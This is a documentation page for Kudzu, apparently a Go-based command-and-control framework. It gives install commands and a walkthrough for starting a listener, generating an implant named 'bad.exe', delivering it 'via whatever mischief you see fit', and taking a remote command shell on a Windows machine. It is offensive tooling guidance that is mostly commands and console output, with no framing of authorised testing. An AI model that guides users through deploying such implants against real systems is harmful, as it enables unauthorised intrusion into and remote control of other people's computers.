📕
Kudzu
  • Kudzu
  • kdzshell
  • Scripts
  • Nodes
Powered by GitBook
On this page
  • Overview
  • Quick Start
  • Notes

Was this helpful?

Kudzu

An extensible Go C2 platform

Overview

Kudzu is a Go based C2 platform with an emphasis on extensibility. My goal was to provide a platform to which new scripts and exploits could be easily added and modified, and written in a modern language. It is a lofty goal, especially for a lone coder of dubious skill, but with enough time, determination, and caffeine, great things are possible!

Quick Start

Installation

Windows:

>> go get -u github.com/TerminalJockey/Kudzu
>> cd %GOPATH%\src\github.com\TerminalJockey\Kudzu
>> go build -o KudzuConsole.exe main.go
>> KudzuConsole.exe

Linux:

>> go get -u github.com/TerminalJockey/Kudzu
>> cd ~/go/src/github.com/TerminalJockey/Kudzu
>> go build -o KudzuConsole main.go
>> sudo ./KudzuConsole

Usage

The usual workflow is as follows:

  • Start listener

<kudzu> nodes
<kudzu nodes> setop nodetype tcp
<kudzu nodes> setop addr 127.0.0.1
<kudzu nodes> setop port 31337
<kudzu nodes> run
<kudzu nodes> ls
Nodes:
Listeners:
6e770a3487 127.0.0.1:7896
<kudzu nodes>

  • Generate implant

<kudzu> implants
<kudzu implants> setop filename bad.exe
<kudzu implants> setop listener 6e770a3487
<kudzu implants> setop implanttype cmd
<kudzu implants> run
{cmd  {6e770a3487 0xc0000049e0}}
proceed? Y/N > y
generated implant! check ../tmp/
<kudzu implants>

  • Deliver your implant via whatever mischief you see fit (???)

  • Profit!

<kudzu implants> Got Connection ID: 34ffa7713f 127.0.0.1:7896
<kudzu implants> nodes
<kudzu nodes> interact 34ffa7713f                                                   
interacting...
34ffa7713f
found node for interaction
Microsoft Windows [Version REDACTED]
(c) 31337 Microsoft Corporation. All rights reserved.

C:\Users\TESTER\>whoami
desktop\TESTER
C:\Users\TESTER\>

Notes

  • Each menu has a help option, and you can swap to your desired menu simply by typing the relevant keyword as shown above.

  • Using the runscript command while in an implant cmdshell causes the base64 script contents to be written to the cmdshell's stdin. While it doesnt look like anything is executed or submitted, it is unintended and may (read will likely) generate some weird looking traffic.

Nextkdzshell

Last updated 4 years ago

Was this helpful?